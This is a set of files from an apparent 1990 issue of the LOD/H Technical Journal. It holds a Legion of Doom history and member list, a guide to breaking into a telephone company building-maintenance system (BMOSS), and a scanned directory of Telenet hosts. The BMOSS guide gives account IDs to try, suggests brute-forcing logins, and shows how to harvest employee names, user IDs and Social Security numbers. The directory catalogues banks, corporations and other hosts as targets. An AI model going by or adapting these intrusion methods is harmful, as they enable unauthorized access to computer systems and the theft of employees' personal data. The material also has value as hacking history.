the ideal is there. Whenever a group of individuals get together, you cannot
forget that they are individuals. These individuals can and do make mistakes
in judgement in some cases. But also, they have been and continue to be
victimized by law enforcement and said others. Over the years I have collected
tens of newspaper and magazine articles about "The LOD", myself, and others
with not a one being perfectly accurate. You have heard it before: don't
believe everything you read. That goes for this article also, although I have
made an honest attempt at ensuring that it is truthful and accurate, as Ripley
said: believe it, or not.

I have been "retired" for quite some time now. My definition of retired is
simply that of keeping my activities to those of a strictly legitimate nature.
It is quite funny yet pitiful to here people say, "once a crook always a
crook" AND BELIEVE IT! That statement is a fallacy. Nearly everyone has done
something wrong when they were young yet many grow up to become the so called
normal, law abiding citizens that society says we should be. At this point in
time and in the foreseeable future, the risks of exploring and learning about
telephone and computer networks in a less than legitimate fashion outweigh the
benefits. I think many of the older hackers have adopted this philosophy out
of necessity. This decision is even easier after reflecting on the events of
which I have seen during the course of my "career". Those events are primarily
those of seeing people's rights being violated by law enforcement. Their
privacy being forsaken by the media. I do not dispute however, that some
hackers have done these same things to other hackers and other people. Neither
side is right or fair so I suppose it is time to exit since it's getting too
hot in the kitchen. I will remain however, in an advisory capacity to the
Technical Journal and group for as long as they continue exist. If you are to
believe the rumors, LOD has been dead many times, again untrue. The main
drawback of becoming a BBS hermit is how the rumors start to accrue as time
progresses. I have been "busted" perhaps a hundred times if you believe every
rumor. The fact is that I have never been visited let alone busted. I have
seen many people get into trouble due to their own carelessness. Those who
have remained unmolested by the authorities are either very careful and
paranoid, or are helping them catch others. I have been extremely careful and
exceedingly paranoid, period.

Now that I have harassed the reader with my comments regarding the whole
hacking/phreaking experience, I present the story. Please note that I realize
many people could care less about all this, and if you are in that category
you can always throw this into the shredder, now. But, there is a sufficient
number of people who actually are curious to get the real story on this stuff
so here it is, presented to correct the many inaccuracies which have surfaced
over the years and also for the sake of posterity.

_____________________________________________________________________________

During the winter break from school in late 1983, I took a trip up to Long
Island, NY to visit Quasi Moto. I had met him in south Florida, and he had
since moved. He decided to put up a BBS, and while visiting him, we worked on
it. For those who do not remember, its name was PLOVERNET. PLOVERNET was
considered a resurrected OSUNY by some since some users migrated to PLOVERNET
after OSUNY went down, at least in part, by an article in Newsweek mentioning
it. A new hacker magazine, 2600, started posting advertisements on various
boards. I had been in contact with Emmanuel Goldstein, the editor of 2600, on
Pirates Cove, another 516 BBS. I gave him the number to PLOVERNET and due to
the large amount of users, (500, of which 70% were relatively active) 2600 had
plenty of response. PLOVERNET went online in January of 1984 and shortly
thereafter it was the busiest BBS around. It was so busy in fact, that a long
distance service called LDX had stopped connecting people who dialed
516-935-2481 which was PLOVERNET's number. Now remember, this is early 1984
here. The practice of blocking calls to a certain number wasn't really done
by common carriers until 1986/87 with the emergence of new security software
and audit trail information. I picked the best phreaks and hackers from
PLOVERNET and invited them onto the newly created LOD BBS. LOD was one of the
first boards which upon connection did nothing until you entered the primary
password, and there was no new user routine as the board was invitation only.
Again, this was back in early 1984. It was a fairly original albeit paranoid
practice at the time, and many boards subsequently adopted the technique as
security became an increasing concern.

Various groups had started forming such as Fargo 4A and Knights of Shadow.
I was admitted into Knights of Shadow in early 84. After suggesting some
promising new phreaks/hacks for membership and being turned down because they
were not well known enough, (ie: they weren't big names even though they knew
more than the guys who supposedly were) I put up the Legion Of Doom! bulletin
board and shortly thereafter started a phreak/hack group of the same name.
This was about May of 84 from what my records show. I had been a member of
KOS and LOD or a brief time and then KOS broke up. Although there were many
users on the LOD bbs, VERY FEW WERE MEMBERS OF THE GROUP! This distinction
seems to have been forgotten by many, since some who were on the BBS have
claimed to have been in the group, which is not true.

The name Legion Of Doom! obviously came from the cartoon series which
pitted them against The Superfriends. I suppose other group names have
come from stranger sources. My handle, Lex Luthor was taken from the
movie Superman I. In the cartoon series, LOD is led by Lex Luthor and
thus, the group name was rather fitting. Being young and naive, I thought
having a handle of someone who claimed to have 'the greatest criminal mind on
Earth' and leading a group of the world's most notorious criminals would be
cool. That was about 7-8 years ago. Now however, I see that there is nothing
cool or attractive about being a criminal (believe it, or not).

The original group consisted of phreaks who I had thought were very good
but were not considered 'famous' like those in KOS. Those original members
later became some of the best known phreak personalities and contributed
substantially to the knowledge of new and old phreaks alike. A list of members
from the very beginning to the present follows. Through my records and from
the best of my recollection I have approximated dates of entrance and exit and
other information. Also, I believe I have a complete list however, there
could be a mistake or two. Very few if any, handles from the past have been
duplicated by 'impostors' whether knowingly or unknowingly.

I look at this article as a historical document seeing how no other group
has survived as long as LOD has. LOD originally consisted mainly of phreaks,
but had split into two separate entities. LOD for telecommunications
hobbyists, and LOH for hacking and security enthusiasts.

Handle Entered Exit Location Reason for leaving
-----------------------------------------------------------------------------
Lex Luthor early 84 CURRENT Here/There ---CURRENT MEMBER---
Karl Marx early 84 late 85 Colorado Went underground/quit.
Mark Tabas early 84 late 85 Colorado Many reasons.
Agrajag The Prolonged early 84 late 85 California Loss of interest.
King Blotto early 84 late 85 Ohio No time/college.
Blue Archer early 84 Fall 87 Texas College.
The Dragyn early 84 late 86 Minnesota No time/lost interest.

Unknown Soldier mid 84 early 85 Florida Busted- Toll fraud.
Sharp Razor late 84 early 86 New Jersey Busted- Abusing CIS.
Doctor Who late 84 early 86 Mass. Misc. Trouble
Lord Havok late 84 CURRENT Here/There ---CURRENT MEMBER---
Sir Francis Drake late 84 early 86 California ???
Paul Muad'dib late 84 early 86 New York Went underground/quit.
Phucked Agent 04 late 84 late 87 California No time. School.
X-man late 84 mid 85 New York Busted- Blue boxing.
Randy Smith late 84 mid 85 Texas ???

Steve Dahl early 85 early 86 Illinois Busted-Carding.
The Warlock early 85 early 86 Florida Lost interest.
Terminal Man early 85 late 85 Mass. Kicked out-malicious hacking

Silver Spy late 86 Fall 87 Mass. College.
The Videosmith early 86 Fall 87 Penn. Lost interest.
Kerrang Khan early 86 Fall 87 U.K. ???
The Marauder early 86 mid 88 Conn. Lost interest.
Gary Seven early 86 mid 88 Florida Lost interest.
Bill From RNOC early 87 late 87 New York Misc. Trouble.

Carrier Culprit mid 87 mid 88 Penn. Lost interest.
Master of Impact mid 87 mid 88 California School.
The Leftist mid 87 Sum 89 Georgia Misc. Trouble.
Phantom Phreaker mid 87 Fall 89 Here/There Lost interest.
Doom Prophet mid 87 Fall 89 Here/There Lost interest.

Thomas Covenant early 88 early 89 New York Misc. Trouble.
The Mentor mid 88 Sum 89 Here/There Lost interest.
The Urvile mid 88 Sum 89 Georgia Misc. Trouble.
Phase Jitter mid 88 CURRENT Here/There ---CURRENT MEMBER---
Prime Suspect mid 88 CURRENT Here/There ---CURRENT MEMBER---
The Prophet late 88 Sum 89 Georgia Misc. Trouble.
Skinny Puppy late 88 CURRENT Here/There ---CURRENT MEMBER----
Professor Falken late 89 CURRENT Here/There ---CURRENT MEMBER---


Directory key:
"Lost Interest": simply means they lost interest in phreaking/hacking in
general, not lost interest in LOD/H.
"???": reason for leaving is unknown.
Misc. Trouble: Exactly that. Too much to go into here.
Of all 38 members, only one was forcefully ejected. It was found out that
Terminal Man destroyed data that was not related to covering his tracks. This
has always been unacceptable to us, regardless of what the media and law
enforcement tries to get you to think.
Remember, people's entrance/exit times have been estimated.


[ End of Article ]
The LOD/H Technical Journal, Issue #4: File 07 of 10

The Trasher's Handbook to B.M.O.S.S.
by
Spherical Aberration

INTRODUCTION:

Those who have actually trashed at Bell Co. before know that finding an
installation can be a pain. Most Telco buildings these days are un-marked,
plain, and generally overlooked by the average person. The buildings
were specifically made so that they WOULD be overlooked, concealing
itself and its contents. Knowing where all Bell Co. installations are
would be nice, and through the help of BMOSS we can find out where they
ALL are.

NOTE: It is possible to get locations from your city hall, just take a
look at what property Bell Co. owns and locate it. However, there are few
catches to this method. First, most cities charge you to find out who
owns what property and there might be a waiting period of a few days.
Second, not all Bell Co. property is owned by Bell Co. There are
instances of Bell Co. renting a piece of property from a company and
using the existing building, possibly with the leasing companies logo
still on it.

BMOSS stands for Building Maintenance Operations Service System.
BMOSS provides computer support for daily building maintenance tasks.
A comprehensive database helps users keep track of repair activities.
Telco field mechanics logon everyday to do assorted field mechanic
stuff. From BMOSS they can check on tasks needed to be done, send
messages to users, charge various Telco installations for work, log time
sheets, generate purchase orders, see where his buddies are eating lunch etc.

BMOSSes are usually located in a BOCC (Building Operations Control
Center) or in a REOC (Real Estate Operations Center). BMOSS is run
under AT&T Unix System V and at some points is quite Unix-like. At each
center is one PDP-11/44 or a PDP-11/84 mainframe that is the base of
operations for that center and other installations supported by that
BOCC/REOC.

LOGGING ONTO BMOSS:

Before logging on to BMOSS you must select the proper type of
terminal emulation. BMOSS has 4 types of emulations available for all
users. Users within the BOCC/REOC use either VT100 or VT220 compatible
terminals, while other internal stations will use an LA120 printer
terminal. Field Mechanics at a remote location use their typewriter
like LA12 printer terminals.

Identifying a BMOSS dialup is not that hard at all. After hitting a
three [CR]'s the system will respond with something like this:

(BEEP!)

Good Morning (Depending on what time of day it is)

BASE/OE - Fri 04/23/90 09:43:22 - Online 9

User ID?
Password?

Typically user IDs are the three initials of the field mechanics name.
After inputting your ID you will be prompted with a Password? request.
Passwords can be from 6 to 8 characters in length, including punctuation
marks, the first letter must begin with an alphabet-letter or a number.
They cannot contain spaces or the users first/middle/last name.
Periodically the system will prompt the user for a new password. This
period of time is usually set by the system administrator.

I have found that the "WRK:A10" user ID or a variation of WRK:xxx
where xxx is a alpha-numerical combination has worked excellent for me.
I believe the WRK:xxx is some type of low-level account when field
mechanics lose their current ID/PW combination. Initials also have been
found on most of the systems, so a WRK:xxx and Initials brute-force attempt
just may give you a working ID.


IN BMOSS:

Once penetrating initial security you are then prompted with BMOSS's
FLD> main level identifier. This FLD> changes as you move from BMOSS's
root to the various main BMOSS branches.

Sometimes when you logon to BMOSS you will receive a memo saying,
"NOTE - Check your office" at this time go to the Office and read the memos
sent to you. Read THE OFFICE later in this article to learn how.

BMOSS was designed with the average Joe in mind and is very logically
laid out. BMOSS was modeled after UNIX's Tree-oriented structure.
Here is a Tree of BMOSS's structure:

BMOSS
_____________|_____________
| | | | | |
CON DAT ACT FOR BIL OFF

Main Branches:
CON- Control Functions (Sys Admin payroll/timesheet functions)
DAT- Database Maintenance (What we are mainly concerned with)
ACT- Field Activity (Handles field activities)
FOR- Force Administration (Recording labor hrs for time sheets etc.)
BIL- Bill Paying (Processing purchase orders, producing expense accts.)
OFF- Electronic Office (Receive/Send Messages or Page users)

Each main branch then branches off into its own specific
commands. I will concentrate on the Database Maintenance functions since
the other functions have little or no use to us.

DATABASE MAINTENANCE:

To haul in the mother lode you go into the Database Maintenance area
from the root. This is accomplished by typing DAT in at the FLD>
prompt. Now you should get a DAT> prompt meaning you are now in the
Database Maintenance section. To get a listing of the available DAT
commands type in 'SHO' which is short for SHOW. We are mainly concerned
with the BLD (Building Master) function. Once the BLD function is
selected you will be prompted for a sub-form. There are 7 sub-forms for
the BLD function.

BLD Sub-Forms:
1. GEN- General Background
2. OWN- Building Ownership (used for adding a new building to database)
3. LES- Lease Terms (used for adding a new building to database)
4. EMG- Emergency Data (contains Police and Fire Dept. that serve this
location and their respective telephone numbers, and whether the
location has backup power and fire-sprinklers etc.)
5. RES- Maintenance Responsibility (Maintenance entries for building)
6. WRD- Building Warden (Building Wardens number etc.)
7. NOT- General Notes (Notes about the particular building)
8. ACC- Accounting Distribution (Account for particular building)

Accessing the above information is as easy as selection of the three
letter identifier at the Sub-Form prompt. We are particularly concerned
with the GEN (General Background) information. This function gives us the
following data:

1. Building's Number
2. Building's Complete Address
3. Building's Name
4. Building's Sector (Bell informational purposes only)
5. Building's Zone (Bell informational purposes only)
6. Whether or not Bell owns the building. (A Y/N combination is usually
shown here. Y meaning its is owned by Bellco, N meaning its not
owned by Bellco.)
7. The building's group (One letter identifier)
8. The building's use. (Garage/Warehouse/Office etc.)
9. The kind of telephone equipment used in the building. (ESS1A etc.)
10. Whether or not Bell is Sub-leasing parts of the building. (Y/N identifier)
11. The number of floors in the building
12. The number of basements in the building (A number of 3 here would
mean the building has 3 below ground level floors.
13. Whether or not the building has a cable vault. (Y/N identifier)
14. Gross Square footage of the building
15. The number of reserved parking spaces for the building.

Once entering the DAT section and entering GEN as your sub-form
selection you will be prompted for a building number. Random selection
of building numbers is necessary because they vary from area to area.
Once a legitimate building number is accessed the above information will
be displayed.

Ok, you now have the information you need, how do you get back to a
previous directory or even log off ? That's quite easy. Typing in EXI
(short for EXIT) will bring you back up to the root FLD> one directory at
a time. For logging off the system you should hit EXI until you reach the
FLD> root then BYE and you will get:

BASE/OE - Fri 4/23/90 10:22:13 - Offline 9

Have a Good Morning

OTHER FUNCTIONS:

I have found the REPORTS function most helpful in finding other
user IDs. To get a listing of the 20+ different types reports type
'HELP REPORT' at the FLD> prompt. We are particularly concerned with
REPORT 41, the Estimated vs. Actual Hours Log. We bring this up by
typing from the FLD:

FLD> REPORT 41 04/02/90-04/06/90 <cr>

You are inquiring for the estimated vs. actual hours time on a series
of jobs from April 4th 1990 through April 6th 1990. The output then
kicks out the hours and such. Every field mechanic that worked throughout
those days will be displayed in- First name, Middle Initial, and Last Name
totally spelled out for you.

Another useful report is REPORT 90- Data Access Log. It is called up
by typing:

FLD> REPORT 90 <cr>
Date Range? 04/06/90-04/08/90

The system then kicks out all users that used the SCOPE command on
other users. The system prints out the users full name and actual USER ID
and who the user scoped including the scoped-user's Social Security number.

THE OFFICE:

When you are prompted that you should check your messages you should
do so immediately before any work is done in BMOSS. First you must go to
your office which is done by selecting OFF from the FLD> identifier.
Once this is done your FLD> prompt will change to a OFF> prompt. Typing
HELP will give you the available HELP commands for the office.

To check the messages type in:

OFF> STATUS <cr>

BMOSS will reply with the following: (example)

Memo From User Subject Status
-------------- ------------------ ---------------------- ---
IPAAA 04/01/90 Wile E Coyote Current Task Info OUT
BNAAA 04/02/90 Susie B Hott Last Saturday Night IN

The user then sees he has a memo from his boss about his current
tasks and a memo from his co-worker/seductress Susie B. Hott. Fuck his
boss, he wants to read what Susie has to say. So you type in:

OFF> PRINT BNAAA <cr>


--- MEMO ---
Date: 04/02/90
Time: 08:11

From: Susie B Hott
To: Legion Of Doom

Subject: Last Saturday Night

LOD, I really enjoyed last saturday night. We must do it again.
Give me a call soon, 555-WETT.
** Susie


A useful command is a list of OFFICE users. This gives you another
listing of user's Full-Name/ID combinations. Get this by typing:

OFF> USERS <cr>

It will then print out the users who are in the Electronic Office
database.

CONCLUSION:

You can get HELP from anywhere just by typing HELP from the prompt.
Or if you need specific information about a function type in HELP then
the function name. Such as:

FLD> HELP REPORT (This gives you options/help on the REPORT command)

BMOSS can be used for a large amount of purposes for the
hacker/trasher. Even though it doesn't have any really powerful
commands to self-destruct the telephone company it can be used to access
other building's trash, and other things that may interest you.

______________________
( Spherical Aberration )
The LOD/H Technical Journal, Issue #4: File #08 of 10

The Legion Of Hackers Present:
Updated: Telenet Directory
Part A: Addresses 201XXX to 424XXX
Revision #5 Last Updated: 2/10/90
(Includes Mnemonic Host Names)

Scanned and Written by:
Erik Bloodaxe

INTRODUCTION:
-------------

It has been some time since our last update. Our old list (Revision #4) has
been distributed to those in the United States and internationally thanks to
the widespread use of the PSS network. For this reason we are including the
format for converting this 'local' address list into accessible hosts using
the standard scheme for telenet when accessed from 'foreign' networks.

For example, the local address: 20114 is 031102010001400 using the standard
format. 3110 is the DNIC (Data Network Identifier Code) for USS Telenet
and the zero preceding it is needed to make it clear to the foreign
network that the NUA (Network User Address) is a non-local address. Another
example, the local address is 203155 would be: 031102030015500 thus: 0DNIC NPA
00 XXX YY NPA is the area-code prefix (this is not necessarily an area code),
XXX is the sub-address and YY is the port which is usually 00.
For those unfamiliar with Telenet addressing, it generally follows the format
of grouping hosts into area codes. Thus, our directory is grouped accordingly.
There are 'non-standard' address prefixes which are rather obscure. These
commonly are owned by the same company or organization, whereas the area code
format contains hosts from many companies or organizations. The state an area
code resides is also listed to give you an idea of its location.
I have also included Telenet commands, mnemonic addresses, a somewhat current
list of pc-pursuit dialers, and a few things to consider for the would-be
Telenet scanner.

NOTES:

When accessing telenet from abroad, ignore the '$' after the address. This
denotes to users of the USA that an NUI (Network User ID) is required due to
the host not accepting collect charges for the connection.

Addresses preceded by a * refuse collect connections, but I was
unable to connect with them to determine what they were.

Addresses that have no comments next to them either hang up upon connection,
or I was unable to evoke any response from them.

Due to its immense size, this directory has been presented in a 'rougher' form
than our previous ones. The time to make it look 'pretty' was determined to
not be worth the effort.


TELENET COMMANDS
----------------

Most commands are listed in their four character form, however,
some may be abbreviated to merely one character (ie. C & D).

CONN Allows user to connect to a specified host
DISA ECHO
DISA FLOW
DISA TFLO
DISC Disconnect from current host
DTAPE ?
ENAB ECHO
ENAB FLOW
ENAB TFLO
FULL Full duplex
HANG Hang up port
HALF Half duplex
MAIL Telemail service
PAR Set parameters as specified
PAR? Shows current parameter settings
RESE Resets the node to inactive
RST Sets parameters of remote host as specified
RST? Shows current parameters of remote host
SET Same as PAR
SET? Same as PAR?
STAT Shows current port
TAPE ?
TELE Telemail service
TEST CHAR Test of all ascii characters
TEST ECHO Test which echos all characters typed
TEST TRIA Test which makes repeating triangle
TEST VERS Shows current pad software version

The default command is CONN, so if an address is entered at the
'@' prompt, an attempt will be made to connect to that address.

A connection attempt may be aborted by sending a break signal.
This will put you back to the '@' prompt.

To return to the '@' prompt from an established connection the
user must type '@' followed by carriage return.

Normal 300/1200 users awaken the pad with two carriage returns.
2400 baud users must type '@' then carriage return.

To awaken the pad in the Uninet format, type: carriage return,
period, then carriage return (upon initial connection).

To find the telenet dialup nearest your location, call 800-424-
9494 at 300/1200 baud. At the '@' prompt, type 'MAIL'. Enter
user name 'PHONES' with password 'PHONES'.


TELENET DIRECTORY
-----------------

201--NEW JERSEY--ADDRESSES SCANNED: 0-2000

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 1 PC Pursuit Dialer (1200)
14 WELCOME, NAME OR #?
15 " "
$ 20 VM/370
$ 22 PC Pursuit Dialer (2400)
* 23
25 WELCOME, NAME OR #?
32 D&B
$ 34 PRIME MWH
$ 35 PRIME
45 NEWSNET
$ 49 VAX
50 UNIX Interet
$ 51 PRIME USCGB
53 Colgates IICS
$ 55 PRIME USCGB
$ 66 PRIME SYS001
67 Warner Computer Systems
68 " "
69 " "
74 enter class
83 ENTER ID:
84 D&B
86 D&B
88 D&B
89 VM/370
$ 129a
138 HP-3000
* 140
146 HP-3000
149 VAX
* 150
156 UNIX Securities Data Company
159a
163 VU/TEXT
164 VU/TEXT
166 VM/370 New Jersey Educational Net
171 >>
172 >>
173
200 D&B
201 D&B
220 VAX Investment Technologies
225 VAX " "
$ 241
242 D&B
243 D&B
244 D&B
246 D&B
249 password required
* 251
252 PRIME
259 VAX CCMI/McGraw Hill
* 260
$ 301 PC Pursuit Dialer (1200)
334 TINTON1
* 336
$ 350 Concurrent Computer Corp
353 enter switch characters
$ 355 Concurrent Computer Corp
359 Telenet Async to 3270
367
* 371
* 379
453 Telenet Async to 3270
454a Telenet Async to 3270
$ 458 ENTER REQUEST
$ 459 "
461 VAX
463a Telenet Async to 3270
470 Decserver
$ 472 MHP201A
476 X.29 Password:
477 Please enter logon cmd
$ 478 MHP205A
479 Please enter logon cmd
520 Enter Access ID:
521 Bankers Trust Online
522 VAX NYBTRP
* 548
586 Dow Jones News Retrieval
587 " "
589 " "
604 Lipton Network
700 HP-3000
702 TOPS-20 CEI
722 INSCI/90
730 "
751 "
752 "
770 "
792 "
799
830 INSCI/90
841 "
850
870 INSCI/90
890 "
895 "
899
910 INSCI/90
912 "
914 "
916
918 INSCI/90
940 "
950 Bankers Trust Online
951 " "
952 " "
953 " "
954 " "
955 " "
956 " "
957 " "
958 " "
959 " "
999
1025
1051 VU/TEXT
1052 "
1053 "
1054 "
1055 "
1056 "
1057 "
1058 "
1059 "
1060 "
1061 "
1062 "
1063 "
1064 "
1065 "
1066 "
1067 "
1068 "
1069 "
1075 "
1076 "
1077 "
1078 "
1079 "


202--WASHINGTON D.C.--ADRESSES SCANNED: 0-800

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
10 PRIME
31 VAX News Machine
$ 36 Network Sign-on Failed
$ 38 "
$ 47 VAX
* 48
49 ENTER SYSTEM ID--
$ 115 PC Pursuit Dialer (300)
$ 116 PC Pursuit Dialer (1200)
$ 117 PC Pursuit Dialer (2400)
* 123
132 VAX
133 BA
134 BA
$ 138 VAX Gallaudet University
$ 139 DEC-10
141 PRIME Telemail
142 PRIME Telemail
$ 149
150 VAX IDR
* 151
$ 154 Telenet Async to 3270
$ 155a Telenet Async to 3270
$ 156 VAX American Psychiatric Assn
* 157
161 UNIX pac
162 enter user id-
$ 165 HP-3000
$ 166 VAX
201 Host Name:
202
203 USER ID:
214 PRIME SPA
217
* 224
* 230
232a
$ 235 PRIME AMSC
$ 239 PRIME AMSA
* 241
* 242
* 243
245 AOS
* 253
* 254
255 Morgan Stanley Network
* 258
* 260
* 265
* 266
* 275
* 276
* 277
$ 278 USER ID
308 PRIME
309 PRIME
312 PRIME
* 330
* 331
* 332
* 333
* 334
* 335
336 VAX Congressional Quarterly
337 VAX "
$ 343 PRIME OT
360 HP-3000
361
362
* 364
365 LEXIS/NEXIS
366 "
367 "
* 371
* 372
* 373
* 377
$ 390 #Connect Requested
$ 391 "
* 403
430 >
* 433
* 434
439 Institute of Nuclear Power
440 "
441 "
442 you are now connected
444 Institute of Nuclear Power
$ 455
456
457
458
$ 462
$ 463
465
466
467
469
470
472
$ 473
$ 474
$ 475
$ 532 VAX
$ 535 AOS
* 536
* 652
* 653
* 654
693 HP-3000 MPE XL
709
710
711
712
810 Telenet Async to 3270
811a Telenet Async to 3270
1180 INVALID-SW-CHARACTERS
1181
1182 NCR Comten



203--CONNECTICUT--ADDRESSES SCANNED: 0-600

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
---

  
-------------------------------------------------
22 VM/370
* 57
$ 60 HP-3000
66 Login Please:
72 HP-3000
73a Password:
75 VAX
$ 105 PC Pursuit Dialer (2400)
$ 120 PC Pursuit Dialer (300)
$ 121 PC Pursuit Dialer (1200)
$ 132 VAX
* 135
136 PRIME SYSA
$ 140 ID
165 Telekurs USA
* 230
* 231
304 HP-3000
$ 305 Name?
307 HP-3000
310
* 311
* 331
* 332
* 501
602 DESTINATION?


205--ALABAMA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 30
$ 33 ID
* 34
* 36
$ 73 PRIME ALABMA
* 137
$ 145 HP-3000


206--WASHINGTON--ADDRESSES SCANNED: 0-1000

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 20 HP-3000
$ 30 HP-3000
32 VAX
$ 35 DMOLNCT
$ 38 AOS
$ 40 PRIME P6350
$ 42 AOS
$ 44 AOS
$ 50 AOS
53
$ 57 AOS
65 PRIME OAD
$ 131 AOS
$ 132 VAX ETA-RX
$ 135 AOS
137a Boeing msg switch
$ 138 USSMSG2
$ 139 WANG VS SECURITIES (FRS)
$ 141 AOS
$ 145 AOS
$ 146 PRIME SEATLE
$ 147 AOS
* 150
$ 160 AOS
$ 161 AOS
175a Boeing test
$ 205 PC Pursuit Dialer (300)
$ 206 PC Pursuit Dialer (1200)
207a
$ 208 PC Pursuit Dialer (2400)
$ 250 WANG VS SYSTEM ONE (FRC)
$ 251 WANG VS SYSTEM TWO (TACOMA)
$ 338
$ 357 HP-3000
$ 430 Environmental Ctrl Monitor
439 bcs network
440 NOS Boeing
447 NOS Boeing
448 bcs network
449 VM/370


207--MAINE--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 51


208--IDAHO--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 42 AOS
$ 43 AOS
$ 56 AOS
$ 131 AOS
$ 134 AOS
$ 135 AOS
$ 136 AOS
$ 137 AOS
$ 140 AOS
$ 141 AOS
* 150
$ 152 AOS


209--CALIFORNIA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
$ 31 AOS
* 33
* 34


211--DUN & BRADSTREET--ADDRESSES SCANNED: 0-100/1000-2000

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
1140
1142
1145 Dun & Bradstreet Terminal
1190 " "
1195 " "
1240 " "
1244 " "
1290 " "
1291 " "
1295 " "
1390 " "
1391 " "
1392 PRIME
1396 Dun & Bradstreet Terminal
1490 PRIME
1491 Dun & Bradstreet Terminal
1492 " "
1493 " "
1494 " "
1540 " "
1591 " "
1594 " "
1594 " "
1640 " "
1690 " "
1693 " "
2140 CCS Online
2141 CCS Online
2142 VM/370
2143 sls1
2145 VM/370
2150 PRIME
2151 fsd2
2152 socy
2153 css3
2154 CCS Online
2155 CCS Online
2156 ecl1
2157 tbs1
2158 dbc1
2159 exx2
2160 nyt2
2162 css1
2163 css2
2164 bofa
2165 soc1
2166 soc2
2167 socx
2168 soc3
2169 soca
2170 socb
2171 socc
2172 dnb1
2173 mdy2
2174 koln
2175 fsd1
2176 ptts
2177 has1
2178 has3
2179 levi
2180 nyt1
2181 pers
2182 risk
2183 usc1
2184 cids
2185 zyt1
2186 inel
2187 fop1
2188 kbm1
2189 kbm2
2190 kbm3
2191 kbm4
2192 sls1
2193 mdy1
2194 ira1
2195 ira2
2196 why1
2197 ndg1
2198 lit1
2450 PRIME
3141 IDC/370
6140 OAG


212--NYC-BRONX & MANHATTAN--ADDRESSES SCANNED: 0-1200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 11 PLEASE BEGIN
$ 28 PC Pursuit Dialer (2400)
31 VM/370
* 34
39 PRIME IDDD
40 PLEASE ENTER /LOGIN
* 48
$ 52 PRIME SYSA
$ 73 USS00
74 VM/370
79 ENTER ID:
* 85
* 86
$ 99 HP-3000
105 ****INVALID SIGNON
106 "
108 "
109 "
110 "
112 VM/370
$ 124 VAX
131 VM/370
* 132
* 135
137 PRIME NY60
141 PRIME Telemail
142 PRIME "
145 ENTER ACCESS ID:
146 "
* 149
152 VAX
$ 154 PRIME NYORK
* 157
* 158
* 160
$ 167 PRIME MPISBS
170 Information Services Net
172 "
$ 173 Brown Brothers
174 Information Services Net
* 197
200 ENTER IDENTIFICATION:
216 Bank of New York
226 USER ID
231 VM/370
$ 235 PRIME JAMACA
237 TIMEINC NYK
238
246 VAX UniTraC
248 PRIME RYE
* 249
* 255
* 256
$ 257 BANAMEX Data Network
258 ENTER ACCESS ID:
$ 259 VAX BTNET
260 Bankers Trust Online
263 VAX
266 UNIX
267 UNIX
$ 271 :
* 273
$ 274 INVALID INPUT
275 Bankers Trust Online
* 278
* 279
* 306
$ 315 PC Pursuit Dialer (1200)
320 ENTER IDENTIFICATION
321 "
$ 322 COMMAND UNRECOGNIZED
* 326
328 ENTER IDENTIFICATION
* 336
345 PRIME NMSG
$ 350 VTAM002
$ 351 "
* 352
* 354
359
376 Bankers Trust Online
377 "
378 "
379 "
* 432
433 VAX
443 VAX
444 PRIME EMCO
$ 446 VAX
449 VM/370
446
468
479 Invalid Login Attempt
* 496
* 497
500 enter a for astra
501 "
502 "
503 "
504 "
505 "
506 "
507 "
535 TIMEINC NYK
536 "
537 "
539 VOS
$ 540 VAX Client Videotext Server
$ 541 VAX "
544 TIMEINC NYK
545 "
$ 546 APLICACO:
$ 548 PRIME TREPP1
552 TIMEINC NYK
553 "
554 "
566 "
567 "
* 576
577 Telenet Async to 3270
579a Telenet Async to 3270
580
615 Shearson Lehman Hutton
631
649 WANG VS
693
702
713 PRIME NY60
$ 726 VAX
$ 737 FINLAY FINE JEWELRY
$ 752 "
$ 753 "
755 VM/370
* 768
935
* 970
* 971
* 972
* 973
* 974
* 975
* 976
* 977
* 978
* 979
981 UNIX
* 1009
* 1031
1034
1036
1039
* 1040
$ 1045 HP-3000
1049 MHP201A
1052 PRIME FTC0
1069 VAX
$ 1071 GS/1
$ 1072 GS/1
* 1074
* 1075


213--CALIFORNIA--ADDRESSES SCANNED: 0-1200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
21 PRIME C6
22 PRIME D6
* 23
24 Marketron Research
25
33
35 Marketron Research
40 PRIME A6
* 41
44
* 45
51
$ 52 PRIME AIS8
* 54
* 57
58 PRIME ACSI
79 UNIX Interactive Systems
88 PRIME MSCOST
$ 92a
102 PRIME TRWE.A
$ 103 PC Pursuit Dialer (1200)
105 PRIME SWOP
$ 113
118 VAX
121 PRIME SWWE1
122 PRIME TRNGW2
123 PRIME SWWA1
124 PRIME CS.CAR
125 PRIME SWLAR
126 HP-3000
128 PRIME CS.SD
$ 143 HP-3000 ANA Trading Corporation
* 144
151 PRIME CSSWR1
153 PRIME SWLA1
154 PRIME SWWCR
155 PRIME CS.LA
$ 166 BW/IP International Inc.
* 169
172a
$ 176 AOS
* 178
199 PRIME C6
219
220 Telenet Async to 3270
221a Telenet Async to 3270
227a
* 249
* 250
* 252
* 255
* 256
* 257
260 Telenet Async to 3270
261a Telenet Async to 3270
* 336
$ 338 HP-3000
340 PRIME TRNGW
342 PRIME SWLB1
347
* 361
$ 369 PRIME LA
* 371
374 Telenet Async to 3270
375a Telenet Async to 3270
$ 412 PC Pursuit Dialer (1200)
$ 413 PC Pursuit Dialer (2400)
* 464
485a
488a
* 1041
* 1043
1403 COMPUTAX
1404 COMPUTAX


